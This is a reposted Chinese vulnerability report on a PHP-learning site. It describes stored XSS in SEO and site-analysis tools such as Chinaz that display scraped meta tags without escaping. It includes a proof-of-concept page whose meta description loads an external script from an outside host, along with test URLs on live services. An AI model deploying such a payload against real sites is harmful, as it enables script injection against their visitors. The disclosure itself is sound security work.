网站地图    收藏   

主页 > 后端 > 网站安全 >

站长之家存储型xss(一种新思路) - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 这是一类网站。详细说明:现在有很多网站信息查询,seo优化,网站安全检测之类的网站,这些网站通常会抓取网页的meta信息。这样如果用户的meta是恶意代码,就会出现问题。站长之家...

这是一类网站。
详细说明:现在有很多网站信息查询,seo优化,网站安全检测之类的网站,这些网站通常会抓取网页的meta信息。这样如果用户的meta是恶意代码,就会出现问题。
站长之家等网站就有这样的问题。
测试代码,写一个简单的页面:
 
<html>
<head><meta name="keywords" content='tmxk.org' />
<meta name="description" content="<script src=http://tmxk.org/x.js style=''" /></head><body></body></html>
 
然后到站长之家去检测,
seo.chinaz.com/?host=unbet8.com%2f%
截图:
 

 
 
 
 
 
其它举例:
 
http://www.gongju.com/meta/#url=unbet8.com/0.htm
http://www.gongju.com/meta/ret/01370d996e987723/
http://tool.chinaz.com/Tools/MetaCheck.aspx?url=unbet8.com%2F%
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论